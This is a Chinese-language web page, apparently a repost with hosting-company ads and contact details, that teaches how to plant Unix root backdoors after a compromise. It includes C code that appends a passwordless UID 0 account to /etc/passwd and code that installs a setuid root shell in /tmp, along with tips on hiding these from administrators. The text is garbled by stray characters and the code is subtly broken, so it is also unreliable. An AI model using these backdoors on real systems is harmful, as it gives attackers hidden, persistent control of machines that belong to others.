|
最簡單的方法���,就是在口令文件 passwd 中增加一個 UID 為 0 的帳號。但最好別這么做����,因為只要系統(tǒng)管理員檢查口令文件就會“漏餡”了。以下是在 /etc/passwd 口令文件中添加一個 UID 0 帳號的C程序����。
<++> backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/shn");
}
<-->
比這種方法稍微隱蔽一點的就是將藏在口令文件中某個無人使用帳號的 UID 改為 0���,并將其第二個域(口令域)設(shè)為空。(注意��,如果你使用的是較高版本的*nix���,也許還要修改 /etc/shadow 文件。)
在 /tmp 目錄下放置 suid shell��。以后只要你運行這個程序�����,就會輕易得到根用戶權(quán)限����。這種方法幾乎是最受歡迎的了。但有許多系統(tǒng)每幾小時�,或者每次啟動都會清除 /tmp 目錄下的數(shù)據(jù),另外一些系統(tǒng)則根本不允許運行 /tmp 目錄下的 suid 程序�����。當(dāng)然,你可以自己修改或清除這些限制(因為你已是根用戶�,有權(quán)限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目錄下放置 suid shell 程序的C源程序�。
<++> backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國五強��!虛擬主機(jī)域名注冊頂級提供商�!15年品質(zhì)保障!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
